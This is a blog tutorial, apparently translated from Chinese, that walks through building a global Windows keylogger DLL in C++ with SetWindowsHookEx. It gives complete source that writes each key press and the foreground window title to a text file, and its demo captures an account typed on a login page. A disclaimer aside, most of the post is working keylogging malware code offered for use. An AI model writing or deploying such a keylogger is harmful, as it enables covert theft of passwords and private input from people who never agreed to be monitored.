C++ Hacker Programming: A Keylogger Implemented with HOOK Technology
There is a technique called HOOK, which people habitually call a hook. Hook techniques have a fairly wide range of applications: input monitoring, API interception, message capturing, and so on.
What we are building today is a keylogger.
Build tool: Visual Studio 2019
Programming language: C++, naturally. If it were written in Python, would I put "C++" in the title?
Programming technique: HOOK
One more thing:
The Cybersecurity Law of the People's Republic of China stipulates that stealing anyone's information is illegal! This article is for technical reference only; if anyone uses the technique in this article to illegally steal others' information, the author bears no legal responsibility!
There are several kinds of HOOK technology; today I will introduce one of them: Windows hooks.
Windows hooks are further divided into global hooks and local hooks. A local hook targets a single thread, whereas a global hook targets the entire operating system, so it needs a DLL to support it (Windows loads the hook DLL into every process that receives the hooked messages, so the hook procedure cannot live in the calling program's own executable).
Open Visual Studio 2019 and choose Create a new project -> Dynamic-Link Library (DLL), as shown in the figure:
This is the function we will use, SetWindowsHookEx(), defined as follows:

```cpp
HHOOK SetWindowsHookEx(
    _In_     int       idHook,
    _In_     HOOKPROC  lpfn,
    _In_opt_ HINSTANCE hmod,
    _In_     DWORD     dwThreadId
);
```

The parameters of SetWindowsHookEx():
idHook: the hook type; the one we use is WH_KEYBOARD
lpfn: specifies the address of the hook procedure; we need to write this function ourselves
hmod: module handle, the handle of the DLL that contains the hook procedure
dwThreadId: the ID of the thread to be hooked; if it is 0, all threads are hooked
UnhookWindowsHookEx() removes the hook, defined as follows:

```cpp
BOOL UnhookWindowsHookEx(_In_ HHOOK hhk);
```

hhk: hook handle
Let's get to work!!!
First, export two functions:

```cpp
extern "C" __declspec(dllexport) BOOL SetHookOn();
extern "C" __declspec(dllexport) BOOL SetHookOff();
```

Initialization; note that it is DllMain(), not DLLMain(), which many experts get wrong:

```cpp
HHOOK g_keyHook = NULL;     // handle returned by SetWindowsHookEx
HINSTANCE g_Inst = NULL;    // this DLL's module handle, needed as the hmod argument
LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam);

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    g_Inst = (HINSTANCE)hModule;
    return TRUE;
}
```

The function that enables the hook:

```cpp
BOOL SetHookOn()
{
    // dwThreadId = 0 makes this a global hook; hmod must be the handle of the
    // DLL that contains KeyboardProc, which DllMain stored in g_Inst.
    g_keyHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_Inst, 0);
    if (g_keyHook)
    {
        return TRUE;
    }
    return FALSE;
}
```

The function that removes the hook:

```cpp
BOOL SetHookOff()
{
    return UnhookWindowsHookEx(g_keyHook);
}
```

The keyboard hook procedure; the first part obtains the title of the foreground window:

```cpp
LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam)
{
    // A hook procedure must pass the message on without processing it when
    // code < 0; HC_NOREMOVE means the message was only peeked, not removed.
    if (code == HC_NOREMOVE || code < 0)
    {
        return CallNextHookEx(g_keyHook, code, wParam, lParam);
    }
    // Bit 30 of lParam is the previous key state: it is set for auto-repeat
    // and for key-up, so only the first key-down of each press is recorded.
    if (lParam & 0x40000000)
    {
        return CallNextHookEx(g_keyHook, code, wParam, lParam);
    }

    // Title of the foreground window and image path of its process
    HWND hWnd = GetForegroundWindow();
    DWORD dwProcess = 0;
    GetWindowThreadProcessId(hWnd, &dwProcess);
    HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcess);
    WCHAR wszProcessPath[MAX_PATH] = { 0 };
    DWORD dwSize = MAX_PATH;
    if (hProcess)
    {
        QueryFullProcessImageNameW(hProcess, 0, wszProcessPath, &dwSize);
        CloseHandle(hProcess);
    }
    CHAR szTitle[MAX_PATH] = { 0 };
    GetWindowTextA(hWnd, szTitle, MAX_PATH);

    FILE* fp = fopen("文件路徑", "a");   // put the path of your own txt file here
    if (fp == NULL)
    {
        return CallNextHookEx(g_keyHook, code, wParam, lParam);
    }
    char szKeyName[100] = { 0 };
    GetKeyNameTextA((LONG)lParam, szKeyName, 100);
    // One line per key press: window title, tab, key name, CRLF
    fwrite(szTitle, 1, strlen(szTitle), fp);
    fwrite("\t", 1, 1, fp);
    fwrite(szKeyName, 1, strlen(szKeyName), fp);
    fwrite("\r\n", 1, 2, fp);
    fclose(fp);
    return CallNextHookEx(g_keyHook, code, wParam, lParam);
}
```

I did not write a file path in the first argument of fopen(); create a txt file yourselves and fill in its path.
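To make clear what a WH_KEYBOARD procedure actually receives, and why the `lParam & 0x40000000` test above drops auto-repeat and key-up events, here is an added example that is not part of the original article and not the article's DLL. It decodes the documented bit layout of the lParam and reproduces the procedure's filter decision without calling any Windows API, so it compiles on any platform; the same reading is what an analyst applies when reviewing a hook DLL's log logic. The `HC_ACTION` and `HC_NOREMOVE` values are the ones from winuser.h; the struct and function names are my own.

```cpp
#include <cstdint>

// Hook-code constants as defined in <winuser.h>; redefined here so the
// example also compiles without the Windows SDK.
constexpr int HC_ACTION   = 0;
constexpr int HC_NOREMOVE = 3;

// Fields packed into the lParam that a WH_KEYBOARD procedure receives
// (the WM_KEYDOWN / WM_KEYUP lParam layout).
struct KeyEvent {
    uint16_t repeatCount;   // bits 0-15
    uint8_t  scanCode;      // bits 16-23
    bool     extended;      // bit 24: extended key (right Ctrl, arrow keys, ...)
    bool     altDown;       // bit 29: context code, Alt held down
    bool     previousDown;  // bit 30: key was already down before this message
    bool     keyUp;         // bit 31: transition state, 1 = key is being released
};

KeyEvent DecodeKeyboardLParam(uint32_t lParam) {
    KeyEvent e;
    e.repeatCount  = static_cast<uint16_t>(lParam & 0xFFFFu);
    e.scanCode     = static_cast<uint8_t>((lParam >> 16) & 0xFFu);
    e.extended     = ((lParam >> 24) & 1u) != 0;
    e.altDown      = ((lParam >> 29) & 1u) != 0;
    e.previousDown = ((lParam >> 30) & 1u) != 0;
    e.keyUp        = ((lParam >> 31) & 1u) != 0;
    return e;
}

// Mirrors the decision logic of the article's KeyboardProc: returns true only
// for the events the hook would write to its log file; everything else is
// chained straight on with CallNextHookEx.
bool HookWouldLog(int code, uint32_t lParam) {
    if (code < 0 || code == HC_NOREMOVE) return false;  // must only chain, never process
    if (lParam & 0x40000000u) return false;             // previous-state bit: repeat or key-up
    return true;
}

int main() {
    // Constructed sample values: scan code 0x1E (the 'A' key), repeat count 1.
    const uint32_t firstDown = 0x001E0001u;  // first key-down: logged
    const uint32_t autoRepeat = 0x401E0001u; // bit 30 set: dropped
    const uint32_t keyUp = 0xC01E0001u;      // bits 30 and 31 set: dropped
    return (HookWouldLog(HC_ACTION, firstDown) && !HookWouldLog(HC_ACTION, autoRepeat)
            && !HookWouldLog(HC_ACTION, keyUp)) ? 0 : 1;
}
```

The three sample lParam values are constructed, not captured from a real session. Note that because bit 30 is also set on key-up, the filter records each physical key exactly once, on its first key-down, which is what the article's log in the demo section shows.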
Complete code

```cpp
#include "pch.h"
#include <windows.h>
#include <stdio.h>
#pragma warning(disable:4996)   // allow fopen without the _s variant

extern "C" __declspec(dllexport) BOOL SetHookOn();
extern "C" __declspec(dllexport) BOOL SetHookOff();

HHOOK g_keyHook = NULL;     // handle returned by SetWindowsHookEx
HINSTANCE g_Inst = NULL;    // this DLL's module handle, needed as the hmod argument
LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam);

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    g_Inst = (HINSTANCE)hModule;
    return TRUE;
}

BOOL SetHookOn()
{
    // dwThreadId = 0 makes this a global hook; hmod must be the handle of the
    // DLL that contains KeyboardProc, which DllMain stored in g_Inst.
    g_keyHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_Inst, 0);
    if (g_keyHook)
    {
        return TRUE;
    }
    return FALSE;
}

BOOL SetHookOff()
{
    return UnhookWindowsHookEx(g_keyHook);
}

LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam)
{
    // A hook procedure must pass the message on without processing it when
    // code < 0; HC_NOREMOVE means the message was only peeked, not removed.
    if (code == HC_NOREMOVE || code < 0)
    {
        return CallNextHookEx(g_keyHook, code, wParam, lParam);
    }
    // Bit 30 of lParam is the previous key state: it is set for auto-repeat
    // and for key-up, so only the first key-down of each press is recorded.
    if (lParam & 0x40000000)
    {
        return CallNextHookEx(g_keyHook, code, wParam, lParam);
    }

    // Title of the foreground window and image path of its process
    HWND hWnd = GetForegroundWindow();
    DWORD dwProcess = 0;
    GetWindowThreadProcessId(hWnd, &dwProcess);
    HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcess);
    WCHAR wszProcessPath[MAX_PATH] = { 0 };
    DWORD dwSize = MAX_PATH;
    if (hProcess)
    {
        QueryFullProcessImageNameW(hProcess, 0, wszProcessPath, &dwSize);
        CloseHandle(hProcess);
    }
    CHAR szTitle[MAX_PATH] = { 0 };
    GetWindowTextA(hWnd, szTitle, MAX_PATH);

    FILE* fp = fopen("", "a");   // left empty on purpose: put the path of your own txt file here
    if (fp == NULL)
    {
        return CallNextHookEx(g_keyHook, code, wParam, lParam);
    }
    char szKeyName[100] = { 0 };
    GetKeyNameTextA((LONG)lParam, szKeyName, 100);
    // One line per key press: window title, tab, key name, CRLF
    fwrite(szTitle, 1, strlen(szTitle), fp);
    fwrite("\t", 1, 1, fp);
    fwrite(szKeyName, 1, strlen(szKeyName), fp);
    fwrite("\r\n", 1, 2, fp);
    fclose(fp);
    return CallNextHookEx(g_keyHook, code, wParam, lParam);
}
```

Build the project; this produces a .lib file and a .dll file.
Create an MFC project with two buttons, …
Project demo:
On the Baidu login page I typed the account 12345, then pressed Caps Lock once, then typed ABCD
Summary